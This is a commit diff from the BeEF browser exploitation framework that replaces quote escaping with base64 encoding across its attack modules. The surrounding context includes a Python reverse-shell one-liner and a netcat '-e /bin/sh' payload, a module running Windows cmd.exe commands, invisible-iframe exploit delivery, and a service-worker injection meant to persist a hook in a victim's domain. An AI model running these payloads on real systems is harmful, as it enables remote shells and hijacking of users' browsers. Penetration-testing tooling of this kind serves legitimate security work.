Replace gsub quotes with base64 encoding
This commit is contained in:
Brendan Coles
@@ -7,7 +7,7 @@
|
||||
beef.execute(function() {
|
||||
|
||||
try {
|
||||
var msg = decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@msg).delete("\n") %>'));
|
||||
var msg = decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@msg) %>'));
|
||||
beef.debug(msg);
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
|
||||
} catch(e) {
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var cmd = '<%= @cmd.gsub(/'/, "\\'") %>';
|
||||
var cmd = beef.encode.base64.decode('<%= Base64.strict_encode64(@cmd) %>');
|
||||
var result = "command was not sent";
|
||||
|
||||
try {
|
||||
|
||||
@@ -9,7 +9,7 @@ beef.execute(function() {
|
||||
var result = "command sent";
|
||||
|
||||
try {
|
||||
var command_str = "<%= command_str.gsub!(/"/, '\\"') %>";
|
||||
var command_str = beef.encode.base64.decode('<%= Base64.strict_encode64(@command_str) %>');
|
||||
var getWorkingDir= Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("Home",Components.interfaces.nsIFile);
|
||||
var lFile = Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
|
||||
var lPath = "C:\\WINDOWS\\system32\\cmd.exe"; // maybe "%WINDIR%\\system32\\cmd.exe" would work?
|
||||
|
||||
@@ -9,7 +9,7 @@ class Mozilla_nsiprocess_interface < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{'name' => 'ports', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'}
|
||||
{'name' => 'command_str', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'}
|
||||
]
|
||||
end
|
||||
|
||||
|
||||
@@ -20,7 +20,7 @@ class Rfi_scanner < BeEF::Core::Command
|
||||
if input['name'] == 'payload'
|
||||
case input['value']
|
||||
when "reverse_python" # msfvenom -p cmd/unix/reverse_python LHOST=X.X.X.X LPORT=XXXX
|
||||
cmd = Base64.encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);").gsub(/\r?\n/, '')
|
||||
cmd = Base64.strict_encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);")
|
||||
payload = "`python -c \"exec ('#{cmd}'.decode ('base64') )\"`"
|
||||
when "reverse_netcat"
|
||||
payload = "`nc #{lhost} #{lport} -e /bin/sh`"
|
||||
|
||||
@@ -7,7 +7,7 @@
|
||||
beef.execute(function() {
|
||||
|
||||
var rhost = '<%= @rhost %>';
|
||||
var cmd = '<%= Base64.encode64(@cmd).delete("\n") %>';
|
||||
var cmd = '<%= Base64.strict_encode64(@cmd) %>';
|
||||
var timeout = 15;
|
||||
|
||||
var netgear_dgn2200_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var uri = '<%= @uri.gsub(/'/, "\\'") %>';
|
||||
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
|
||||
|
||||
var alienvault_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
|
||||
alienvault_iframe_<%= @command_id %>.setAttribute('src', uri);
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var uri = '<%= @uri.gsub(/'/, "\\'") %>';
|
||||
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
|
||||
|
||||
var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
|
||||
cisco_collaboration_iframe.setAttribute('src', uri);
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var uri = '<%= @uri.gsub(/'/, "\\'") %>';
|
||||
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
|
||||
|
||||
var serendipity_iframe = beef.dom.createInvisibleIframe();
|
||||
serendipity_iframe.setAttribute('src', uri);
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var uri = '<%= @uri.gsub(/'/, "\\'") %>';
|
||||
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
|
||||
|
||||
var serendipity_iframe = beef.dom.createInvisibleIframe();
|
||||
serendipity_iframe.setAttribute('src', uri);
|
||||
|
||||
@@ -8,7 +8,7 @@ beef.execute(function() {
|
||||
var timeout = '<%= @timeout %>' * 1000;
|
||||
|
||||
var blockui = function() {
|
||||
$j.blockUI({ message: decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@message).delete("\n") %>')) });
|
||||
$j.blockUI({ message: decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@message) %>')) });
|
||||
setTimeout("$j.unblockUI();", <%= @timeout %> * 1000);
|
||||
}
|
||||
|
||||
|
||||
@@ -7,7 +7,7 @@
|
||||
beef.execute(function() {
|
||||
var scriptElem = document.createElement("script");
|
||||
var hook = encodeURIComponent(beef.net.hook);
|
||||
var tempBody = encodeURIComponent('<%= @tempBody.gsub(/'/, "\\'") %>');
|
||||
var tempBody = encodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@tempBody) %>');
|
||||
scriptElem.innerHTML = 'navigator.serviceWorker.register("<%=@JSONPPath%>onfetch%3Dfunction(e)%7B%0Aif(!(e.request.url.indexOf(%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+'%27)>=0))%0Ae.respondWith(new%20Response(%27'+tempBody+'%3Cscript%20src%3D%5C%27'+beef.net.httpproto+'%3A%2F%2F'+beef.net.host+'%3A'+beef.net.port+hook+'%5C%27%20type%3D%5C%27text%2Fjavascript%5C%27%3E%3C%2Fscript%3E%27%2C%7Bheaders%3A%20%7B%27Content-Type%27%3A%27text%2Fhtml%27%7D%7D))%0Aelse%0Ae.fetch(e.request)%0A%7D%2F%2F")';
|
||||
$j("body").append(scriptElem);
|
||||
beef.net.send("<%= @command_url %>", <%=@command_id%>, "result=Script element inserted within the body, domain for the browser permanently compromized if everything went as expected.");
|
||||
|
||||
@@ -17,7 +17,7 @@ beef.execute(function() {
|
||||
var hid = '#'+id;
|
||||
var hpid = '#'+pid;
|
||||
$j(hid).append(elp);
|
||||
$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>')));
|
||||
$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>')));
|
||||
$j(hid).append(ell);
|
||||
$j(hid).append(elr);
|
||||
$j(hid).click(function() {
|
||||
|
||||
@@ -17,7 +17,7 @@ beef.execute(function() {
|
||||
var hid = '#'+id;
|
||||
var hpid = '#'+pid;
|
||||
$j(hid).append(elp);
|
||||
$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>')));
|
||||
$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>')));
|
||||
$j(hid).append(ell);
|
||||
$j(hid).append(elr);
|
||||
$j(hid).click(function() {
|
||||
|
||||
@@ -17,7 +17,7 @@ beef.execute(function() {
|
||||
var hid = '#'+id;
|
||||
var hpid = '#'+pid;
|
||||
$j(hid).append(elp);
|
||||
$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>'))+" <img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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'>");
|
||||
$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>'))+" <img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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'>");
|
||||
$j(hid).append(ell);
|
||||
//$j(hid).append("<u>Problems installing?</u> ");
|
||||
$j(hid).append(elr);
|
||||
|
||||
@@ -17,7 +17,7 @@ beef.execute(function() {
|
||||
var hid = '#'+id;
|
||||
var hpid = '#'+pid;
|
||||
$j(hid).append(elp);
|
||||
$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.encode64(@notification_text).delete("\n") %>')));
|
||||
$j(hpid).html(decodeURIComponent(beef.encode.base64.decode('<%= Base64.strict_encode64(@notification_text) %>')));
|
||||
$j(hid).append(ell);
|
||||
$j(hid).append(elr);
|
||||
$j(hid).click(function() {
|
||||
|
||||
Reference in New Issue
Block a user